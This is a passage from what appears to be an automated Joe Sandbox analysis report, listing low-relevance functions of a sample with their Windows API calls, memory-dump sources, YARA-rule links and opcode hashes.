                                                                                  • Opcode ID: 5335faa71366dcd3d81234343433091bd3d7927d7c8e8129adcb4d2b98ef085f
                                                                                  • Instruction ID: 08e3cae020ad338aa1e26db6b5abba07248177100dcd749c804e64b3e5f7a7d2
                                                                                  • Opcode Fuzzy Hash: 5335faa71366dcd3d81234343433091bd3d7927d7c8e8129adcb4d2b98ef085f
                                                                                  • Instruction Fuzzy Hash: 2D2188F5D0020CABDB10EF94DD45BEE77B8AB14308F0045ADE50967281E7799B54CB96
                                                                                  Function 004466A5 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3_catch.LIBCMT ref: 004466AC
                                                                                    • Part of subcall function 00455E53: __EH_prolog3.LIBCMT ref: 00455E5A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3H_prolog3_catch
                                                                                  • String ID:
                                                                                  • API String ID: 1882928916-0
                                                                                  • Opcode ID: ac60a18a575d1741eb584009b83ae8c4c056ee932a35365db0f6eda8e6bd3564
                                                                                  • Instruction ID: ef7db74fc8a856a825baf0e7b14e31e80663fc9dc5098c8ada489beeb091cbdc
                                                                                  • Opcode Fuzzy Hash: ac60a18a575d1741eb584009b83ae8c4c056ee932a35365db0f6eda8e6bd3564
                                                                                  • Instruction Fuzzy Hash: 02218C76A00208DFDF05DF64C4819DE3BB5FF49354F12842BF905AB241C738AA91CBA6
                                                                                  Function 00421600 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen
                                                                                  • String ID:
                                                                                  • API String ID: 4218353326-0
                                                                                  • Opcode ID: bc6d0f8321922d2d68900f78b7ad3bd3e12a70d301ec1650455ae96d65f21111
                                                                                  • Instruction ID: d3905485c2aaccaba322299f7b0fd60730f090d58c41e7c0547adfed1e8a3bf1
                                                                                  • Opcode Fuzzy Hash: bc6d0f8321922d2d68900f78b7ad3bd3e12a70d301ec1650455ae96d65f21111
                                                                                  • Instruction Fuzzy Hash: 18215EB0A002089BCB04DF94D891BAFB7B5AF54344F24811EF906AB395D738AE55CB95
                                                                                  Function 0044A7E5 Relevance: 1.6, APIs: 1, Instructions: 64windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • PeekMessageA.USER32(?,?,00000000,00000000,00000000,00000000), ref: 0044A817
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePeek
                                                                                  • String ID:
                                                                                  • API String ID: 2222842502-0
                                                                                  • Opcode ID: 0b278f91028d8f425198af716cfdbffc9bcf1fe9a6cc608ce987001e01bc4e97
                                                                                  • Instruction ID: 3f8b48724866c3ced0bbabd44c1e9d55493f3b06c6a5c7e706a477b40146af02
                                                                                  • Opcode Fuzzy Hash: 0b278f91028d8f425198af716cfdbffc9bcf1fe9a6cc608ce987001e01bc4e97
                                                                                  • Instruction Fuzzy Hash: 04118234A01248ABDB20EF66CC48E9FBFBCEFC4755B14409EE801A7252D7359A11DB65
                                                                                  Function 6A6DE7C0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memcpy_s
                                                                                  • String ID:
                                                                                  • API String ID: 2001391462-0
                                                                                  • Opcode ID: 9d29fae2275fbcbc25cc441022b1e2e8d694bea568d787b85f08f128b7d71f16
                                                                                  • Instruction ID: 1b94ecda1d164f40f890c534c265aae1e8be97a75913e397321ad6cdf927dae2
                                                                                  • Opcode Fuzzy Hash: 9d29fae2275fbcbc25cc441022b1e2e8d694bea568d787b85f08f128b7d71f16
                                                                                  • Instruction Fuzzy Hash: B8118E76200A059FD301EFA8C880DA7F3A9FF8A3107118A5EE65687361EB31F801CB90
                                                                                  Function 0BE9ADD3 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFilePointer.KERNEL32(?,?,?), ref: 0BE9BA1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 973152223-0
                                                                                  • Opcode ID: 6605fa328ddea904379c95cfddc1d09f45a45d1c43ba94a710f505c90578f7a1
                                                                                  • Instruction ID: c33a80f66461adcb0bcdaeef537ce92d7278bb2f2ef3bfb802c246668f69acbd
                                                                                  • Opcode Fuzzy Hash: 6605fa328ddea904379c95cfddc1d09f45a45d1c43ba94a710f505c90578f7a1
                                                                                  • Instruction Fuzzy Hash: AFF0E9B640D288AFCB41CB74EDE04D97FF8FF17124B1416DBD0A2C3293D524AA499322
                                                                                  Function 00407EF0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strlen
                                                                                  • String ID:
                                                                                  • API String ID: 4218353326-0
                                                                                  • Opcode ID: 6cdac38dc7a0fa9a67181883e2ee13ea8b7d54412b82dd952172ab819d6c3e71
                                                                                  • Instruction ID: 49ea4a4f19da8e9af98ac6632e1b5f79d04cfacdd4c3f38886405a4b74a05da0
                                                                                  • Opcode Fuzzy Hash: 6cdac38dc7a0fa9a67181883e2ee13ea8b7d54412b82dd952172ab819d6c3e71
                                                                                  • Instruction Fuzzy Hash: 061100B4E041099BDB04EFA5D942AAEB7B4BF44304F1001BEE40577391EB796E44CB9A
                                                                                  Function 0045B065 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoGetClassObject.COMBASE(?,?,?,00000000,00497360,?,?,?), ref: 0045B08E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassObject
                                                                                  • String ID:
                                                                                  • API String ID: 1165159591-0
                                                                                  • Opcode ID: 27b37e3e991888c34121c91e1f92b4652f423188829591cc679d1ef96ad6299a
                                                                                  • Instruction ID: 450b09d164b3d1e27ee019f1a8408d66d89651e3c8a11009fffe2f29d8fee330
                                                                                  • Opcode Fuzzy Hash: 27b37e3e991888c34121c91e1f92b4652f423188829591cc679d1ef96ad6299a
                                                                                  • Instruction Fuzzy Hash: CD01887660020ABBCF019F90CC04F9F3BA9EF08710F008015FD1596251DB3AD921DBA4
                                                                                  Function 00423360 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00000030,004A8C94,00000000), ref: 004233BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: daf338c4b4a4497a60714ef01aad5f5d2596064cf82fc85d19eb41cf9291a5cc
                                                                                  • Instruction ID: 08d322250c66a9d0edee66c7ca26e244cc996df72a8c5dd14d3884821a8114d9
                                                                                  • Opcode Fuzzy Hash: daf338c4b4a4497a60714ef01aad5f5d2596064cf82fc85d19eb41cf9291a5cc
                                                                                  • Instruction Fuzzy Hash: BB01FFB1354108AFE744CF98DC51FAB77B9EB48B00F10865DBA09D7280DA75ED11CBA8
                                                                                  Function 0042C6F0 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(00000000,00000030,004A8C94,00000000), ref: 0042C748
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 1f70388e38c9bf1354dd1d6139266bea6dc46b0ed918489cc2c734be2a4e7cf8
                                                                                  • Instruction ID: 522326500c8cc681e01e86ebf91a011bdb3712949bfc67665f145ea1f6d70092
                                                                                  • Opcode Fuzzy Hash: 1f70388e38c9bf1354dd1d6139266bea6dc46b0ed918489cc2c734be2a4e7cf8
                                                                                  • Instruction Fuzzy Hash: 3B014F71740208BBD744DF98DC91FAF77B9AB48B00F108159BA0597281D674ED51CBA8
                                                                                  Function 0044AC2D Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(004864E4,00000030,00000000,00000000,00000000,00000000,?,00445ABF), ref: 0044ABFC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 7a7a763f50ea691d8d289543fb3830c628888a49742701a30bc1712dcc5c6c1d
                                                                                  • Instruction ID: 417e21ca1d3231a1a75b0ce9a3cf002aa552813494142bdc372044adee55af4b
                                                                                  • Opcode Fuzzy Hash: 7a7a763f50ea691d8d289543fb3830c628888a49742701a30bc1712dcc5c6c1d
                                                                                  • Instruction Fuzzy Hash: ABF0BB332842019B776476369A85D7BB2ACEFD232A704141FF441D9551DB2CDC52D62B
                                                                                  Function 00455E53 Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3
                                                                                  • String ID:
                                                                                  • API String ID: 431132790-0
                                                                                  • Opcode ID: 6d4307c3d3216d2c3691441de46f0be4c73c9c212d8863ee4da98eb76adf69f2
                                                                                  • Instruction ID: 0b00ff8cdc6424f98211035f87815ebd26eec8a07ec575e53830226f450dc66c
                                                                                  • Opcode Fuzzy Hash: 6d4307c3d3216d2c3691441de46f0be4c73c9c212d8863ee4da98eb76adf69f2
                                                                                  • Instruction Fuzzy Hash: 1501B1306006068BDF24AF61CA2673B3AA5AB91356F10043FE88187392EF3C8D18C70E
                                                                                  Function 00424A60 Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00000030,004A8C94,00000000), ref: 00424AC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: a5219b4c00c23a135b1ab908ac147dfbe1784543f7d2c725ed9cfad23e24d1a0
                                                                                  • Instruction ID: 60a143e11dfc9fde6bbd76473b7a49a237ae05537c2a94a7d1990def1a51bd1b
                                                                                  • Opcode Fuzzy Hash: a5219b4c00c23a135b1ab908ac147dfbe1784543f7d2c725ed9cfad23e24d1a0
                                                                                  • Instruction Fuzzy Hash: A60100B1A00209ABDB04DF98D851FAFB7B4FF48300F108519F905A7341D675D950CBE4
                                                                                  Function 0044B132 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 0044B139
                                                                                    • Part of subcall function 004428ED: _malloc.LIBCMT ref: 0044290B
                                                                                    • Part of subcall function 0044AB00: __EH_prolog3.LIBCMT ref: 0044AB07
                                                                                    • Part of subcall function 0044A97C: SetThreadPriority.KERNEL32(00000000,?,00000000,?,0044B190,?,?,?,?,00000004,00409C74,Function_00008B20,00000000,00000000,00000000,00000000), ref: 0044A988
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog3$PriorityThread_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 576224324-0
                                                                                  • Opcode ID: ae4f7b2a9547747d926e787e0f5ec29c5dc36fb97292b7a962b9e569fd761d1d
                                                                                  • Instruction ID: da3630ea290bbe5f5dae37cc8353403de89be0ff0c362d8cd92a357bcde89ef3
                                                                                  • Opcode Fuzzy Hash: ae4f7b2a9547747d926e787e0f5ec29c5dc36fb97292b7a962b9e569fd761d1d
                                                                                  • Instruction Fuzzy Hash: 2201D670600505AFFF01AF60C811A6E7EA1EF08794F00412AF955D62A1C739CD21DBD9
                                                                                  Function 004443FF Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateWindowExA.USER32(?,00000000,00000000,0000012C,00000000,00000030,?,00000000,00000000,00000000,0000012C,00000000,?,?,00000000,0049BB08), ref: 0044445A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID:
                                                                                  • API String ID: 716092398-0
                                                                                  • Opcode ID: b5f5cde03e016b662fc24c73a18a69d9234e0de4a8c0f236b1194090e71ae53d
                                                                                  • Instruction ID: 1d4048e1da173febf0bcde2320521ae9eabc62b640d9a17010c5c759bcdce4ae
                                                                                  • Opcode Fuzzy Hash: b5f5cde03e016b662fc24c73a18a69d9234e0de4a8c0f236b1194090e71ae53d
                                                                                  • Instruction Fuzzy Hash: 68010472800209AFCF02AFE1CC41ADD7B71BF08308F00452AFA1465161D33A8961EF54
                                                                                  Function 0BE971E3 Relevance: 1.5, APIs: 1, Instructions: 35synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateMutexA.KERNEL32(?,?,?,?,0BEF5193,00000000,00000000,00000000,.mtx,?,xxxxxx,?,Index,0BEFFCE8,00000000,0BEF545C), ref: 0BE97276
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  • Opcode ID: e86df0275a8205feb0fa5669bac49e50ffb4dc1926f038848e10fbbff8ab3abd
                                                                                  • Instruction ID: d35331273f47bde7be00cbf73eb8def9129e6338d40ebf5980943c8287a7d82b
                                                                                  • Opcode Fuzzy Hash: e86df0275a8205feb0fa5669bac49e50ffb4dc1926f038848e10fbbff8ab3abd
                                                                                  • Instruction Fuzzy Hash: EDF049B28300549BCF58DA78E8D9A677394B70434C705115AE40BAB144E7377858C66C
                                                                                  Function 0BE9B920 Relevance: 1.5, APIs: 1, Instructions: 33fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,00000003,00000080,00000000), ref: 0BE9B96E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 3a0e6681f40175f073f5f587384fb30a9bef5413271f8c37f783cc750ae45834
                                                                                  • Instruction ID: 485f68c410f51f5a4a30e1248d80dea6208546b9d94d3c0e2172d9fd3ee1e84b
                                                                                  • Opcode Fuzzy Hash: 3a0e6681f40175f073f5f587384fb30a9bef5413271f8c37f783cc750ae45834
                                                                                  • Instruction Fuzzy Hash: E3E09BA27B055466FA70556DBCC3B4F518EC7C57A9F190131F154D72C0C158DD0652A4
                                                                                  Function 0046C1DD Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • KiUserExceptionDispatcher.NTDLL(?,00000004,00454EA8,?,004447CB,00000004,00454EA8,004441B8,00442D0F,?,004447CB), ref: 0046C220
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DispatcherExceptionUser
                                                                                  • String ID:
                                                                                  • API String ID: 6842923-0
                                                                                  • Opcode ID: 1e1f35d4d0ece4bf11a585a596c5928c7898e7cd87d6e0dd72853d353c81396e
                                                                                  • Instruction ID: a62b274bb2aa07348c08e7cf078303fba1acd1a656781a79e9c90b42a4e36b8b
                                                                                  • Opcode Fuzzy Hash: 1e1f35d4d0ece4bf11a585a596c5928c7898e7cd87d6e0dd72853d353c81396e
                                                                                  • Instruction Fuzzy Hash: ACF03A72C00208AACF11DAD9D844EEFBBB8BB49354F048066F958A7151D7789905DBA0
                                                                                  Function 0040A590 Relevance: 1.5, APIs: 1, Instructions: 31registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegDeleteValueA.KERNEL32(?,?,?), ref: 0040A5BF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteValue
                                                                                  • String ID:
                                                                                  • API String ID: 1108222502-0
                                                                                  • Opcode ID: dbb3f01ee544738ce28dd03af4cd20a1d1c51356b5744b3321e8d5c8fd3f173d
                                                                                  • Instruction ID: 1a88052cc606e39f0091078a90d60d827f50896834bc53fe7b9f33611c24bd45
                                                                                  • Opcode Fuzzy Hash: dbb3f01ee544738ce28dd03af4cd20a1d1c51356b5744b3321e8d5c8fd3f173d
                                                                                  • Instruction Fuzzy Hash: D3F03AB1900218AACF14DBE0C852BFEB378EB48300F404259BA06BB281DB795945CB61
                                                                                  Function 0040A86A Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(?,?), ref: 0040A87B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4510216061.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_401000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 8f385544bad1f22c242810019e6a2bb94703e8f8522350f15491bc20473a14ec
                                                                                  • Instruction ID: 628f85e27ec20345891e79a20fd443186060a202b1d6c9cf28f58ee88d62c12c
